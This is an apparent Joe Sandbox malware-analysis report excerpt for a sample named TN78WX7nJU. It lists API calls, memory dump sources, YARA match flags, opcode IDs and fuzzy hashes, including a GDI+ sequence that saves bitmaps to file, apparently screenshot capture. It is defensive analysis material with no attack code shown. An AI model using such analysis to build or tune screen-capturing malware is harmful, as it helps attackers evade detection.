                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                                                  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 313313983-0
                                                                                                                                                                                                                                                                • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _SpinWait.LIBCONCRT ref: 0249B152
                                                                                                                                                                                                                                                                  • Part of subcall function 02491188: _SpinWait.LIBCONCRT ref: 024911A0
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0249B166
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0249B198
                                                                                                                                                                                                                                                                • List.LIBCMT ref: 0249B21B
                                                                                                                                                                                                                                                                • List.LIBCMT ref: 0249B22A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                • Instruction ID: a858becbfef2f2573ea93ae7eeb81ac6a0ebc75d52e539bd824adb0aaf9d6891
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79316432A00616DFCF11EFA5E9816EEBBB2FF04348B04406FC8156B680CB716A44CF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                                                  • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                                                • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                                                • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                                                                                                                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                                                                                                                                                                                • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2357751836-0
                                                                                                                                                                                                                                                                • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                                                • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 024850A3
                                                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024850B7
                                                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 0248511C
                                                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 0248512B
                                                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0248513B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2395760641-0
                                                                                                                                                                                                                                                                • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                                                • Instruction ID: d8405f890bf42eb45cf1f74c1b39c6b03fa0b3ce4559dc9160be1f10f8ab27f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB2189B2824204AFDB05FFA5C484BEDBBB1BF50715F91800FE485AB280EB749544CFA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(0248DAD7,0248DAD7,00000002,024AED35,024B3951,00000000,?,024A6A05,00000002,00000000,00000000,00000000,?,0248CF88,0248DAD7,00000004), ref: 024B21CA
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B21FF
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B2226
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,0248DAD7), ref: 024B2233
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,0248DAD7), ref: 024B223C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                • Instruction ID: 9f751a2d77698e7bc85e95714a32160c9d74b9882ae28fb9d16b69a7154dee3e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC01D6366457007B931BAB365C44EEB262AAFD1B72B10012BFC15D6391EFE089128539
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431FBF
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B21A0
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                • Instruction ID: 37aa7fd9bfcec6ab2cbedbe0f568f767f4d3db8be227dfbee11a694161e908fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0A9352447003BD3176736AC08BDB262A5FC2F62F15022BFD19923A0EFE18512853A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024929A4: TlsGetValue.KERNEL32(?,?,02490DC2,02492ECF,00000000,?,02490DA0,?,?,?,00000000,?,00000000), ref: 024929AA
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02497BB1
                                                                                                                                                                                                                                                                  • Part of subcall function 024A121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024A1241
                                                                                                                                                                                                                                                                  • Part of subcall function 024A121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024A125A
                                                                                                                                                                                                                                                                  • Part of subcall function 024A121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024A12D0
                                                                                                                                                                                                                                                                  • Part of subcall function 024A121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024A12D8
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02497BBF
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02497BC9
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02497BD3
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02497BF1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                • Instruction ID: a83c842435ca6e27417826ba7a964d08c1b266a7805b9cdadba250df14e66252
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0C2716002186BCF15F677982096EFF2BDF90B18B04426FD80053350DF65DA058FD1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                                                                                                                                                                                  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                                                                                                                                                                                  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                                                                                                                                                                                  • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                                                                                                                                                                                  • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA0C4
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA0D6
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA0E8
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA0FA
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA10C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                • Instruction ID: 654b7c37884042a49afc0c137c61ddce4079d8ff2257fe4b2a94b73b21beabda
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACF06232505220AB8672EF66E8C6C8777DAAE04750B64095BF048D7B11CB71F8A09E79
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B19AF
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B19C1
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B19D4
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B19E5
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B19F6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                • Instruction ID: fb1bb5be7febef862022fbb464458d35641d881de5064fe1cdfc8ab087246599
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F03070D003509B9F726F26AD804453F61AF09B2270002ABF406977B2C774E862EFAE
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0249CF36
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0249CF67
                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0249CF70
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0249CF83
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0249CF8C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
